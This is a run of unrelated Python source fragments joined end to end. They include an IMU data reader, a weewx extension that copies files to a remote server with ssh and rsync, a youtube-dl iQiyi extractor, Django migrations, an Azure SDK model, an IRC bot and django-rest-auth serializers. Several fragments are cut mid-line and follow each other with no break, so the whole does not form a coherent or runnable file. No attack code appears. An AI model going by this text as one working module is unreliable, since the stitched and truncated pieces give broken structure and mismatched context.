ime'].units) fi = 1/(np.diff(cnt10ks_imu).mean()) for vartmp in nci.variables: print(vartmp) if(not "cnt" in vartmp): varname = g + ' ' + vartmp print('reading') self.var_combo.addItem(varname) self.data[varname] = {varname:nci.variables[vartmp],'cnt10ks':nci.variables[cntvar]} self.data[varname]['x0'] = self.data[varname][cntvar] #accx = nci.variables['accx'][:] #accy = nci.variables['accy'][:] #accz = nci.variables['accz'][:] #gyrox = nci.variables['gyrox'][:] #gyroy = nci.variables['gyroy'][:] #gyroz = nci.variables['gyroz'][:] #magx = nci.variables['magx'][:] #magy = nci.variables['magy'][:] #magz = nci.variables['magz'][:] print('Found IMU data') except Exception as e: print('Ha
command # will run!? build the ssh command - n.b: spaces cause wobblies! cmd = ['ssh'] cmd.extend(["%s@%s" % (rsync_user, rsync_server)]) mkdirstr = "mkdir -p" cmd.extend([mkdirstr]) cmd.extend([rem_path]) if wxobs_debug == 2: loginf("sshcmd %s" % cmd) subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.STDOUT) rsync_ssh_str = rem_path rsync_message = ("code 11, rsync mkdir cmd executed" " in % 0.2f seconds") elif ("code 12") and ("Permission denied") in stroutput: if wxobs_debug == 2: logdbg("rsync code 12 - %s" % stroutput) rsync_message = ("Permission error in rsync command, probably at" " remote end authentication ! FIX ME !") loginf(" ERR %s " % (rsync_message)) rsync_message = "code 12, rsync failed, executed in % 0.2f seconds" elif ("code 12") and ("No route to host") in stroutput: if wxobs_debug == 2: logdbg("rsync code 12 - %s" % stroutput) rsync_message = "No route to host error in rsync command ! FIX ME!" loginf(" ERR %s " % (rsync_message)) rsync_message = "code 12, rsync failed, executed in % 0.2f seconds" else: logerr("rsync [%s] reported this error: %s" % (cmd, stroutput)) if log_success: if wxobs_debug == 0: t_o = '' rsync_ssh_str = '' else: t_o = ' to ' t_2 = time.time() loginf("%s" % rsync_message % (t_2-t_1) + t_o + rsync_ssh_str) class wxobs(SearchList): def __init__(self, generator): SearchList.__init__(self, generator) """ This is a minimal SLE - all we want is to make the php configuration easier by transferring the database values as used by weewx, plus a few other variables. It has since expanded to allow the transfer of the sqlite database by using rsync, providing the [Remote] section of the config is populated In wxobs/skin.conf: send_inc: An option to stop sending the include file/s. These contain the database configuration values, timezone and oprional debugging stanzas for the php script to operate. Needless to say you need to send them at least once. 
If you can't think of a reason why you'd need this then you don't need to implement it. I run a mysql database locally and export an sqlite to the remote. This allows me to do that without too much trouble (remembering to set up the symlinks is the biggest issue) include_path: the directory where the php include file will be stored this holds the database configuration as sourced from weewx.conf If you store them locally you can change that path using this option. If you send the files to another server you can change this path using dest_directory (which will affect the database also.) disp_interval: is the time between displayed records; 1800 is a half-hour and is the default display_type: 'single' (default) or 'average' Whether to return the timestamped entry for the value displayed in the periodic Stats table (single), or average it over all the database entries between it and the previous one that was displayed. (average) app_Temp: This is a recent addition to weewx and is not enabled by default. The calculation is performed but there is no field in the stock database. This variable allows for the substitution with another value. The default is to use windchill. Keep it to the group_degrees (because the label is hard coded in.) timezone: If the date or time is not being displayed correctly we'll assume it's a php issue and pass a timezone string to the script. This can be done by adding your time zone as the following example indicates. Replace the string with your zone description timezone = Melbourne/Australia self.php_error: enable php error messages in index.php. This maybe useful at the start of configuration, it shouldn't be needed after everything is running smoothly default is False. set to True to enable this to be sent via the in
clude file. [[Remote]] This is used when you want to tra
nsfer the include file and the database to a remote machine where the web files have been sent seperately with the weewx.conf [FTP] or [RSYNC] section. dest_directory: is the switch that turns this o. It transfers BOTH the include and database files to the same directory as the tuple specifies If using multiple databases and include files make sure they are unique ie:- if you are transferring from multiple machine. It will fetch the rsync user and server from the wxobs/skin.conf file and use those values or if they are missing then it will use the values from the [RSYNC] section of weewx.conf which is possibly configured already. rsync_user (user) = user_name for rsync command rsync_server (server)= ip address of the remote machine send_include = True #This is the default, set to False if you don't want to send the include file repeatedly to the server. Use with caution (ie: remember this setting when things stop working, it might be the cure) rsync_options: Not documented in the skin.conf Default is '-ac'. Use with caution and no spaces allowed. [[RainTiming]] shift_rain: For rain accounting times other than midnight to midnight set this to True If no other options are given the accounting time will be the australian rain day which starts at 9 a.m. default is false - start at midnight 00:00:00 through to the next day. rain_start: used to shift time (in seconds) to something other than 9a.m. The default is 32400 rain_label: the o'clock label for the rain_start above. default is 9 show_warning: An information message will appear on the report page (index.php) if the database is in US units (imperial) or units are detected that don't match the native units required for the delta-T calcs. An information div is included in the report page when this occurs. This is a switch (boolean) to turn it off. wxobs_debug: Allow index.php to include debugging info if set to... 1 and above is low level, variables, some logic. 2 is for wxobs remote cmds etc. 
3 only for delta-T final values (low level - if enabled) 4 only for delta-T unit conversion calcs (verbose) - if enabled 5 only for ordinalCompass conversion calcs (N, NE...CALM) (verbose) 6 is for database debugging [[DeltaT]] calculate_deltaT: Whether to generate deltaT for the report page. Default is not to generate that data. This is a switch (boolean) to turn it on. [[PHPUnits]] tempConvert: speedConvert: pressConvert: rainConvert: These are all used to convert the database units to ones for display by the php generated report. Because we are bypassing weewx to generate the historical data, we can't utilize the inbuilt weewx functions for unit conversion therefore we need to affect them ourselves. This is performed (if needed) by specifying the conversion to be done from the [[PHPUnits]] section of the skin.conf file. The default is to perform no conversion, to accept the units as they are. """ self.wxobs_version = wxobs_version self.wxobs_debug = int(self.generator.skin_dict['wxobs'].get( 'wxobs_debug', '0')) self.send_inc = to_bool(self.generator.skin_dict['wxobs'].get(
# © 2017 Sergio Teruel <sergio.ter
uel@tecnativa.com> # License LGPL-3.0 or later (http://www.gnu.org/licenses/lgpl). from .hooks impor
t pre_init_hook from . import models from . import report
# Copyright (c) 2014,
Max Zwiessele, James Hensman # Licensed under the BSD 3-clause license (see LICENSE.txt) from paramz.transformations import * from paramz.transformations imp
ort __fixed__
# Mantid Repository : https://github.com/mantidproject/mantid
#
# Copyright &copy; 2018 ISIS Rutherford Appleton Laboratory UKRI,
# NScD Oak Ridge National Laboratory, European Spallation Source
# & Institut Laue - Langevin
# SPDX - License - Identifier: GPL - 3.0 +
from __future__ import (absolute_import, division, print_function)

import AbinsModules


class CalculateS(object):
    """
    Factory producing the S calculator required for a given sample form.

    Currently available S calculators:

        * SPowderSemiEmpiricalCalculator
    """

    @staticmethod
    def init(filename=None, temperature=None, sample_form=None, abins_data=None, instrument=None,
             quantum_order_num=None, bin_width=1.0):
        """
        :param filename: name of input DFT file (CASTEP: foo.phonon)
        :param temperature: temperature in K for which calculation of S should be done
        :param sample_form: form in which experimental sample is: Powder or SingleCrystal (str)
        :param abins_data: object of type AbinsData with data from phonon file
        :param instrument: object of type Instrument for which simulation should be performed
        :param quantum_order_num: number of quantum order events taken into account during the simulation
        :param bin_width: width of bins in wavenumber
        """
        # Guard clauses in place of the original nested conditionals.
        if sample_form not in AbinsModules.AbinsConstants.ALL_SAMPLE_FORMS:
            raise ValueError("Invalid sample form %s" % sample_form)
        if sample_form != "Powder":
            # TODO: implement the single-crystal scenario.
            raise ValueError("Only implementation for sample in the form of powder is available.")

        # TODO: implement numerical powder averaging
        return AbinsModules.SPowderSemiEmpiricalCalculator(filename=filename,
                                                           temperature=temperature,
                                                           abins_data=abins_data,
                                                           instrument=instrument,
                                                           quantum_order_num=quantum_order_num,
                                                           bin_width=bin_width)
'id': 'e3f585b550a280af23c98b6cb2be19fb_part2', 'ext': 'f4v', 'title': '名侦探柯南第752集', }, }, { 'info_dict': { 'id': 'e3f585b550a280af23c98b6cb2be19fb_part3', 'ext': 'f4v', 'title': '名侦探柯南第752集', }, }, { 'info_dict': { 'id': 'e3f585b550a280af23c98b6cb2be19fb_part4', 'ext': 'f4v', 'title': '名侦探柯南第752集', }, }, { 'info_dict': { 'id': 'e3f585b550a280af23c98b6cb2be19fb_part5', 'ext': 'f4v', 'title': '名侦探柯南第752集', }, }, { 'info_dict': { 'id': 'e3f585b550a280af23c98b6cb2be19fb_part6', 'ext': 'f4v', 'title': '名侦探柯南第752集', }, }, { 'info_dict': { 'id': 'e3f585b550a280af23c98b6cb2be19fb_part7', 'ext': 'f4v', 'title': '名侦探柯南第752集', }, }, { 'info_dict': { 'id': 'e3f585b550a280af23c98b6cb2be19fb_part8', 'ext': 'f4v', 'title': '名侦探柯南第752集', }, }], 'params': { 'skip_download': True, }, }, { 'url': 'http://www.iqiyi.com/w_19rt6o8t9p.html', 'only_matching': True, }, { 'url': 'http://www.iqiyi.com/a_19rrhbc6kt.html', 'only_matching': True, }, { 'url': 'http://yule.iqiyi.com/pcb.html', 'only_matching': True, }] _FORMATS_MAP = [ ('1', 'h6'), ('2', 'h5'), ('3', 'h4'), ('4', 'h3'), ('5', 'h2'), ('10', 'h1'), ] @staticmethod def md5_text(text): return hashlib.md5(text.encode('utf-8')).hexdigest() def construct_video_urls(self, data, video_id, _uuid): def do_xor(x, y): a = y % 3 if a == 1: return x ^ 121 if a == 2: return x ^ 72 return x ^ 103 def get_encode_code(l): a = 0 b = l.split('-') c = len(b) s = '' for i in range(c - 1, -1, -1): a = do_xor(int(b[c - i - 1], 16), i) s += chr(a) return s[::-1] def get_path_key(x, format_id, segment_index): mg = ')(*&^flash@#$%a' tm = self._download_json( 'http://data.video.qiyi.com/t?tn=' + str(random.random()), video_id, note='Download path key of segment %d for format %s' % (segment_index + 1, format_id) )['t'] t = str(int(math.floor(int(tm) / (600.0)))) return self.md5_text(t + mg + x) video_urls_dict = {} for format_item in data['vp']['tkl'][0]['vs']: if 0 < int(format_item['bid']) <= 10: format_id = self.get_format(format_item['bid']) else: 
continue video_urls = [] video_urls_info = format_item['fs'] if not format_item['fs'][0]['l'].startswith('/'): t = get_encode_code(format_item['fs'][0]['l']) if t.endswith('mp4'): video_urls_info = format_item['flvs'] for segment_index, segment in enumerate(video_urls_info): vl = segment['l'] if not vl.startswith('/'): vl = get_encode_code(vl) key = get_path_key( vl.split('/')[-1].split('.')[0], format_id, segment_index) filesize = segment['b'] base_url = data['vp']['du'].split('/') base_url.insert(-1, key) base_url = '/'.join(base_url) param = { 'su': _uuid, 'qyid': uuid.uuid4().hex, 'client': '', 'z': '', 'bt': '', 'ct': '', 'tn': str(int(time.time())) } api_video_url = base_url + vl + '?' + \ compat_urllib_parse.urlencode(param) js = self._download_json( api_video_url, video_id, note='Download video info of segment %d for format %s' % (segment_index + 1, format_id)) video_url = js['l'] video_urls.append( (video_url, filesize)) video_urls_dict[format_id] = video_urls return video_urls_dict def get_format(self, bid): matched_format_ids = [_format_id for _bid, _format_id in self._FORMATS_MAP if _bid == str(bid)] return matched_format_ids[0] if len(matched_format_ids) else None def get_bid(self, format_id): matched_bids = [_bid for _bid, _format_id in self._FORMATS_MAP if _format_id == format_id] return matched_bids[0] if len(matched_bids) else None def get_raw_data(self, tvid, video_id, enc_key, _uuid): tm = str(int(time.time())) tail = tm + tvid param = { 'key': 'fvip', 'src': self.md5_text('youtube-dl'), 'tvId': tvid, 'vid': video_id, 'vinfo': 1, 'tm': tm, 'enc': self.md5_text(enc_key + tail), 'qyid': _uuid, 'tn': random.random(), 'um': 0, 'authkey': self.md5_text(self.md5_text('') + tail), } api_url = 'http://cache.video.qiyi.com/vms' + '?' 
+ \ compat_urllib_parse.urlencode(param) raw_data = self._download_json(api_url, video_id) return raw_data def get_enc_key(self, swf_url, video_id): # TODO: automatic key extraction # last update at 2015-12-18 for Zombie::bite enc_key = '8b6b683780897eb8d9a48a02ccc4817d'[::-1] return enc_key def _real_extract(self, url): webpage = self._download_webpage( url, 'temp_id', note='download video page') tvid = self._search_regex( r'data-player-tvid\s*=\s*[\'"](\d+)', webpage, 'tvid') video_id = self._search_regex( r'data-player-videoid\s*=\s*[\'"]([a-f\d]+)', webpage, 'video_id') swf_url = self._search_regex( r'(http://[^\'"]+MainPlayer[^.]+\.swf)', webpage, 'swf player URL') _uuid = uuid.uuid4().hex enc_key = self.get_enc_key(swf_url, video_id) raw_data = self.get_raw_data(tvid, video_id, enc_key, _uuid) if raw_data['code'] != 'A000000': raise ExtractorError('Unable to load data. Error code: ' + raw_data['code']) if not raw_data['data']['vp']['tkl']: raise ExtractorError('No support iQiqy VIP video') data = raw_data['data'] title = data['vi']['vn'] # generate video_urls_dict video_urls_dict = self.construct_video_urls( data, video_id, _uuid) # construct info entries = [] for format_id in video_urls_dict:
video_urls = video_urls_dict[format_id] for i, video_url_info in enumerate(video_urls): if len(entries) < i + 1: entries.append({'formats': []}) entries[i]['formats'].append( { 'url': video_url_info[0], 'filesize': video_url_info[-1], 'format_id': format_id, 'preference': int(s
elf.get_bid(format_id)) } ) for i in range(len(entries)): self._sort_formats(entries[i]['formats']) entries[i].update( { 'id': '%s_part%d' % (video_id, i + 1), 'title': title, } ) if len(entries) > 1: info = { '_type': 'multi_video', 'id': video_id, 'title': title, 'entries': entries, }
ices=[(b'BGN', b'Began'), (b'END', b'Ended'), (b'OCR', b'Occurred')], max_length=3, null=True), ), migrations.AddField( model_name='authority', name='dataset', field=models.CharField(blank=True, max_length=255, null=True), ), migrations.AddField( model_name='authority', name='record_status_explanation', field=models.CharField(blank=True, max_length=255, null=True), ), migrations.AddField( model_name='authority', name='record_status_value', field=models.CharField(blank=True, max_length=255, null=True), ), migrations.AddField( model_name='ccrelation', name='data_display_order', field=models.FloatField(default=1.0, help_text=b'Position at which the citation should be displayed in the citation detail view. Whole numbers or decimals can be used.'), ), migrations.AddField( model_name='ccrelation', name='dataset', field=models.CharField(blank=True, max_length=255, null=True), ), migrations.AddField( model_name='ccrelation', name='record_status_explanation', field=models.CharField(blank=True, max_length=255, null=True), ), migrations.AddField( model_name='ccrelation', name='record_status_value', field=models.CharField(blank=True, max_length=255, null=True), ), migrations.AddField( model_name='citation', name='additional_titles', field=models.TextField(blank=True, help_text=b'Additional titles (not delimited, free text).', null=True), ), migrations.AddField( model_name='citation', name='book_series', field=models.CharField(blank=True, help_text=b'Used for books, and potentially other works in a series.', max_length=255, null=True), ), migrations.AddField( model_name='citation', name='dataset', field=models.CharField(blank=True, max_length=255, null=True), ), migrations.AddField( model_name='citation', name='record_status_explanation', field=models.CharField(blank=True, max_length=255, null=True), ), migrations.AddField( model_name='citation', name='record_status_value', field=models.CharField(blank=True, max_length=255, null=True), ), migrations.AddField( 
model_name='historicalacrelation', name='dataset', field=models.CharField(blank=True, max_length=255, null=True), ), migrations.AddField( model_name='historicalacrelation', name='personal_name_first', field=models.CharField(blank=True, max_length=255, null=True), ), migrations.AddField( model_name='historicalacrelation', name='personal_name_last', field=models.CharField(blank=True, max_length=255, null=True), ), migrations.AddField( model_name='historicalacrelation', name='personal_name_suf
fix', field=models.CharField(blank=True, max_length=255, null=True), ), migrations.AddField(
model_name='historicalacrelation', name='record_status_explanation', field=models.CharField(blank=True, max_length=255, null=True), ), migrations.AddField( model_name='historicalacrelation', name='record_status_value', field=models.CharField(blank=True, max_length=255, null=True), ), migrations.AddField( model_name='historicalattribute', name='dataset', field=models.CharField(blank=True, max_length=255, null=True), ), migrations.AddField( model_name='historicalattribute', name='record_status_explanation', field=models.CharField(blank=True, max_length=255, null=True), ), migrations.AddField( model_name='historicalattribute', name='record_status_value', field=models.CharField(blank=True, max_length=255, null=True), ), migrations.AddField( model_name='historicalattribute', name='type_qualifier', field=models.CharField(blank=True, choices=[(b'BGN', b'Began'), (b'END', b'Ended'), (b'OCR', b'Occurred')], max_length=3, null=True), ), migrations.AddField( model_name='historicalauthority', name='dataset', field=models.CharField(blank=True, max_length=255, null=True), ), migrations.AddField( model_name='historicalauthority', name='record_status_explanation', field=models.CharField(blank=True, max_length=255, null=True), ), migrations.AddField( model_name='historicalauthority', name='record_status_value', field=models.CharField(blank=True, max_length=255, null=True), ), migrations.AddField( model_name='historicalccrelation', name='data_display_order', field=models.FloatField(default=1.0, help_text=b'Position at which the citation should be displayed in the citation detail view. 
Whole numbers or decimals can be used.'), ), migrations.AddField( model_name='historicalccrelation', name='dataset', field=models.CharField(blank=True, max_length=255, null=True), ), migrations.AddField( model_name='historicalccrelation', name='record_status_explanation', field=models.CharField(blank=True, max_length=255, null=True), ), migrations.AddField( model_name='historicalccrelation', name='record_status_value', field=models.CharField(blank=True, max_length=255, null=True), ), migrations.AddField( model_name='historicalcitation', name='additional_titles', field=models.TextField(blank=True, help_text=b'Additional titles (not delimited, free text).', null=True), ), migrations.AddField( model_name='historicalcitation', name='book_series', field=models.CharField(blank=True, help_text=b'Used for books, and potentially other works in a series.', max_length=255, null=True), ), migrations.AddField( model_name='historicalcitation', name='dataset', field=models.CharField(blank=True, max_length=255, null=True), ), migrations.AddField( model_name='historicalcitation', name='record_status_explanation', field=models.CharField(blank=True, max_length=255, null=True), ), migrations.AddField( model_name='historicalcitation', name='record_status_value', field=models.CharField(blank=True, max_length=255, null=True), ), migrations.AddField( model_name='historicallinkeddata', name='access_status', field=models.CharField(blank=True, max_length=255, null=True), ), migrations.AddField( model_name='historicallinkeddata', name='access_status_date_verified', field=models.DateField(blank=True, null=True), ), migrations.AddField( model_name='historicallinkeddata', name='dataset', field=models.CharField(blank=True, max_length=255, null=True), ), migrations.AddField( model_name='historicallinkeddata', name='record_status_explanation', field=models.CharField(blank=True, max_length=255, null=True), ), migrations.AddField( model_name='historicallinkeddata', name='record_status_value',
# -*- coding: utf-8 -*-
# Generated by Django 1.9.8 on 2016-10-14 12:51
from __future__ import unicode_literals

from django.db import migrations, models


class Migration(migrations.Migration):
    """Initial schema migration: creates the ``Document`` table."""

    initial = True

    dependencies = [
    ]

    operations = [
        migrations.CreateModel(
            name='Document',
            fields=[
                ('id', models.AutoField(primary_key=True, serialize=False)),
                ('title', models.CharField(max_length=100)),
                ('content', models.TextField()),
                # Set once on INSERT and never changed afterwards.
                ('time', models.DateTimeField(auto_now_add=True)),
                ('meta_tag', models.CharField(max_length=150)),
                # Not editable through forms/admin; maintained in code only.
                ('view_count', models.IntegerField(default=0, editable=False)),
                # NOTE(review): no default declared — assumes every caller
                # supplies a value explicitly; confirm against the model.
                ('public_doc', models.BooleanField()),
                # Refreshed on every save().
                ('update_time', models.DateTimeField(auto_now=True)),
            ],
        ),
    ]
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------

from msrest.serialization import Model


class UploadCertificateResponse(Model):
    """The upload registration certificate response.

    All required parameters must be populated in order to send to Azure.

    :param auth_type: Specifies authentication type. Possible values include:
     'Invalid', 'AzureActiveDirectory'
    :type auth_type: str or ~azure.mgmt.edgegateway.models.AuthenticationType
    :param resource_id: Required. The resource ID of the Data Box
     Edge/Gateway device.
    :type resource_id: str
    :param aad_authority: Required. Azure Active Directory tenant authority.
    :type aad_authority: str
    :param aad_tenant_id: Required. Azure Active Directory tenant ID.
    :type aad_tenant_id: str
    :param service_principal_client_id: Required. Azure Active Directory
     service principal client ID.
    :type service_principal_client_id: str
    :param service_principal_object_id: Required. Azure Active Directory
     service principal object ID.
    :type service_principal_object_id: str
    :param azure_management_endpoint_audience: Required. The azure management
     endpoint audience.
    :type azure_management_endpoint_audience: str
    """

    # msrest uses these reflection tables at (de)serialization time; their
    # contents must match the generated wire format exactly.
    _validation = {
        'resource_id': {'required': True},
        'aad_authority': {'required': True},
        'aad_tenant_id': {'required': True},
        'service_principal_client_id': {'required': True},
        'service_principal_object_id': {'required': True},
        'azure_management_endpoint_audience': {'required': True},
    }

    _attribute_map = {
        'auth_type': {'key': 'authType', 'type': 'str'},
        'resource_id': {'key': 'resourceId', 'type': 'str'},
        'aad_authority': {'key': 'aadAuthority', 'type': 'str'},
        'aad_tenant_id': {'key': 'aadTenantId', 'type': 'str'},
        'service_principal_client_id': {'key': 'servicePrincipalClientId', 'type': 'str'},
        'service_principal_object_id': {'key': 'servicePrincipalObjectId', 'type': 'str'},
        'azure_management_endpoint_audience': {'key': 'azureManagementEndpointAudience', 'type': 'str'},
    }

    def __init__(self, **kwargs):
        super(UploadCertificateResponse, self).__init__(**kwargs)
        # Every mapped attribute is pulled straight from kwargs; attributes
        # not supplied default to None — exactly what the generated
        # per-attribute ``kwargs.get(name, None)`` assignments did.
        for attr_name in self._attribute_map:
            setattr(self, attr_name, kwargs.get(attr_name, None))
'''Todo:
    * Add multiple thread support for async_process functions
    * Potentially thread each handler function? idk
'''
import sys
import socket
import re
import threading
import logging
import time

if sys.hexversion < 0x03000000:  # Python 2
    import Queue as queue
    BlockingIOError = socket.error
else:
    import queue

from .ircclient import IRCClient

logger = logging.getLogger(__name__)

# Somewhat complex regex that accurately matches nick!username@host, with
# named groups for easy parsing and usage.
user_re = re.compile(r'(?P<nick>[\w\d<-\[\]\^\{\}\~]+)!(?P<user>[\w\d<-\[\]\^\{\}\~]+)@(?P<host>.+)')


def _trailing(parts):
    """Join IRC message parts and strip the ':' prefix of a trailing param.

    IRC encodes the final, possibly space-containing parameter with a
    leading ':'; handlers should never see that prefix.  Returns '' when
    there is no trailing parameter at all.
    """
    text = ' '.join(parts)
    if text.startswith(':'):
        return text[1:]
    return text


class IRCBot(IRCClient):
    '''See `IRCClient` for basic client usage, here is usage for the bot system

    Handler notation:
        on_join(self, nick, host, channel)
        on_topic(self, nick, host, channel, topic)
        on_part(self, nick, host, channel, message)
        on_msg(self, nick, host, channel, message)
        on_privmsg(self, nick, host, message)
        on_chanmsg(self, nick, host, channel, message)
        on_notice(self, nick, host, channel, message)
        on_nick(self, nick, new_nick, host)
    '''

    _process_thread = None

    def __init__(self, *args, **kwargs):
        IRCClient.__init__(self, *args, **kwargs)
        # Per-instance handler registry.  This used to be a *class*
        # attribute, so every IRCBot instance shared a single registry —
        # a classic mutable-class-attribute bug.
        self._handlers = {
            'join': [],
            'part': [],
            'kick': [],
            'topic': [],
            'msg': [],
            'privmsg': [],
            'chanmsg': [],
            'notice': [],
            'nick': []
        }

    def _async_process(self):
        """Consume raw IRC lines from ``_in_queue`` and dispatch handlers.

        Runs on its own thread until ``_stop_event`` is set (both are
        provided by `IRCClient`).  Handler exceptions are logged, never
        propagated, so one bad handler cannot kill the loop.
        """
        while not self._stop_event.is_set():
            time.sleep(0.01)
            args = None  # bound before try so the except-logger can use it
            try:
                args = self._in_queue.get_nowait()
                # Raw received lines have the general form:
                #   :nick!user@host COMMAND <ARGS>
                userhost = user_re.search(args[0][1:])
                if userhost:
                    # Bug fix: groups appear in the order nick, user, host;
                    # the old code unpacked them as nick, host, user, so
                    # handlers received the username where the host belongs.
                    nick = userhost.group('nick')
                    host = userhost.group('host')
                    command = args[1]
                    if command == 'JOIN':
                        channel = args[2][1:]  # JOIN channels are : prefixed
                        for handler in self._handlers['join']:
                            handler(self, nick, host, channel)
                    elif command == 'TOPIC':
                        channel = args[2]
                        topic = _trailing(args[3:])
                        for handler in self._handlers['topic']:
                            handler(self, nick, host, channel, topic)
                    elif command == 'PART':
                        channel = args[2]
                        message = _trailing(args[3:])
                        for handler in self._handlers['part']:
                            handler(self, nick, host, channel, message)
                    elif command == 'PRIVMSG':
                        channel = args[2]
                        message = _trailing(args[3:])
                        for handler in self._handlers['msg']:
                            handler(self, nick, host, channel, message)
                        if channel[0] == '#':  # this is a channel
                            for handler in self._handlers['chanmsg']:
                                handler(self, nick, host, channel, message)
                        else:  # private message
                            for handler in self._handlers['privmsg']:
                                handler(self, nick, host, message)
                    elif command == 'KICK':
                        channel = args[2]
                        kicked_nick = args[3]
                        reason = _trailing(args[4:])
                        for handler in self._handlers['kick']:
                            handler(self, nick, host, channel, kicked_nick, reason)
                    elif command == 'NICK':
                        new_nick = args[2][1:]
                        for handler in self._handlers['nick']:
                            handler(self, nick, new_nick, host)
                    elif command == 'NOTICE':
                        # :nick!user@host NOTICE <userchan> :message
                        channel = args[2]
                        message = _trailing(args[3:])
                        for handler in self._handlers['notice']:
                            handler(self, nick, host, channel, message)
                    else:
                        logger.warning("Unhandled command %s" % command)
                self._in_queue.task_done()
            except queue.Empty:
                pass
            except Exception:
                logger.exception("Error while handling message " + str(args))

    def start(self):
        """Start the client, then the handler-dispatch thread."""
        IRCClient.start(self)
        self._process_thread = threading.Thread(target=self._async_process)
        self._process_thread.start()

    def on(self, type):
        '''Decorator factory registering a handler for event ``type``.

        Usage::

            @bot.on('join')
            def on_join(bot, nick, host, channel):
                print("Joined channel %s" % channel)
        '''
        # Bug fix: the inner decorator must take only ``func`` and close
        # over self — the old ``def decorator(self, func)`` signature made
        # ``@bot.on('join')`` pass the function in as ``self`` and crash.
        def decorator(func):
            self._handlers[type].append(func)
            return func
        return decorator

    def on_join(self, func):
        self._handlers['join'].append(func)
        return func

    def on_part(self, func):
        self._handlers['part'].append(func)
        return func

    def on_kick(self, func):
        self._handlers['kick'].append(func)
        return func

    def on_msg(self, func):
        self._handlers['msg'].append(func)
        return func

    def on_privmsg(self, func):
        self._handlers['privmsg'].append(func)
        return func

    def on_chanmsg(self, func):
        self._handlers['chanmsg'].append(func)
        return func

    def on_notice(self, func):
        self._handlers['notice'].append(func)
        return func

    def on_nick(self, func):
        self._handlers['nick'].append(func)
        return func

__all__ = ['IRCBot']
from django.http import HttpRequest
from django.conf import settings
from django.utils.translation import ugettext_lazy as _

try:
    from allauth.account import app_settings as allauth_settings
    from allauth.utils import (email_address_exists,
                               get_username_max_length)
    from allauth.account.adapter import get_adapter
    from allauth.account.utils import setup_user_email
except ImportError:
    raise ImportError("allauth needs to be added to INSTALLED_APPS.")

from rest_framework import serializers
from requests.exceptions import HTTPError

# Import is needed only if we are using social login, in which
# case the allauth.socialaccount will be declared
if 'allauth.socialaccount' in settings.INSTALLED_APPS:
    from allauth.socialaccount.helpers import complete_social_login


class SocialLoginSerializer(serializers.Serializer):
    """Validates a social-provider OAuth token (or auth code) and resolves
    it to a local user via django-allauth.

    Either ``access_token`` or ``code`` must be supplied; ``validate()``
    raises a ValidationError when both are missing.
    """

    access_token = serializers.CharField(required=False, allow_blank=True)
    code = serializers.CharField(required=False, allow_blank=True)

    def _get_request(self):
        # DRF wraps the Django request; unwrap to the raw HttpRequest that
        # allauth's helpers expect.
        request = self.context.get('request')
        if not isinstance(request, HttpRequest):
            request = request._request
        return request

    def get_social_login(self, adapter, app, token, response):
        """
        :param adapter: allauth.socialaccount Adapter subclass. Usually
            OAuthAdapter or Auth2Adapter
        :param app: `allauth.socialaccount.SocialApp` instance
        :param token: `allauth.socialaccount.SocialToken` instance
        :param response: Provider's response for OAuth1. Not used in the
            OAuth2 flow (presumably — confirm against the adapter in use).
        :returns: A populated instance of the
            `allauth.socialaccount.SocialLoginView` instance
        """
        request = self._get_request()
        social_login = adapter.complete_login(request, app, token, response=response)
        social_login.token = token
        return social_login

    def validate(self, attrs):
        """Exchange the incoming credentials for a local user.

        Requires the view to expose ``adapter_class`` (and, for the
        auth-code flow, ``callback_url`` and ``client_class``).  On success
        ``attrs['user']`` is populated with the resolved user.
        """
        view = self.context.get('view')
        request = self._get_request()

        if not view:
            raise serializers.ValidationError(
                _("View is not defined, pass it as a context variable")
            )

        adapter_class = getattr(view, 'adapter_class', None)
        if not adapter_class:
            raise serializers.ValidationError(_("Define adapter_class in view"))

        adapter = adapter_class(request)
        app = adapter.get_provider().get_app(request)

        # More info on code vs access_token
        # http://stackoverflow.com/questions/8666316/facebook-oauth-2-0-code-and-token

        # Case 1: We received the access_token
        if attrs.get('access_token'):
            access_token = attrs.get('access_token')

        # Case 2: We received the authorization code — exchange it for an
        # access token against the provider's token endpoint.
        elif attrs.get('code'):
            self.callback_url = getattr(view, 'callback_url', None)
            self.client_class = getattr(view, 'client_class', None)

            if not self.callback_url:
                raise serializers.ValidationError(
                    _("Define callback_url in view")
                )
            if not self.client_class:
                raise serializers.ValidationError(
                    _("Define client_class in view")
                )

            code = attrs.get('code')

            provider = adapter.get_provider()
            scope = provider.get_scope(request)
            client = self.client_class(
                request,
                app.client_id,
                app.secret,
                adapter.access_token_method,
                adapter.access_token_url,
                self.callback_url,
                scope
            )
            token = client.get_access_token(code)
            access_token = token['access_token']

        else:
            raise serializers.ValidationError(
                _("Incorrect input. access_token or code is required."))

        social_token = adapter.parse_token({'access_token': access_token})
        social_token.app = app

        try:
            login = self.get_social_login(adapter, app, social_token, access_token)
            complete_social_login(request, login)
        except HTTPError:
            # Provider rejected the token (e.g. expired or revoked).
            raise serializers.ValidationError(_('Incorrect value'))

        if not login.is_existing:
            # First login through this provider: create the social account
            # link before exposing the user.
            login.lookup()
            login.save(request, connect=True)
        attrs['user'] = login.account.user

        return attrs


class RegisterSerializer(serializers.Serializer):
    """Username/email/password registration backed by allauth's adapter.

    All cleaning (username, email, password policy) is delegated to the
    configured allauth account adapter so site-level rules apply here too.
    """

    username = serializers.CharField(
        max_length=get_username_max_length(),
        min_length=allauth_settings.USERNAME_MIN_LENGTH,
        required=allauth_settings.USERNAME_REQUIRED
    )
    email = serializers.EmailField(required=allauth_settings.EMAIL_REQUIRED)
    password1 = serializers.CharField(write_only=True)
    password2 = serializers.CharField(write_only=True)

    def validate_username(self, username):
        username = get_adapter().clean_username(username)
        return username

    def validate_email(self, email):
        email = get_adapter().clean_email(email)
        if allauth_settings.UNIQUE_EMAIL:
            if email and email_address_exists(email):
                raise serializers.ValidationError(
                    _("A user is already registered with this e-mail address."))
        return email

    def validate_password1(self, password):
        return get_adapter().clean_password(password)

    def validate(self, data):
        # Cross-field check: the two password entries must agree.
        if data['password1'] != data['password2']:
            raise serializers.ValidationError(_("The two password fields didn't match."))
        return data

    def custom_signup(self, request, user):
        # Hook for subclasses; intentionally a no-op here.
        pass

    def get_cleaned_data(self):
        # Shape mirrors what allauth's save_user() reads from the form.
        return {
            'username': self.validated_data.get('username', ''),
            'password1': self.validated_data.get('password1', ''),
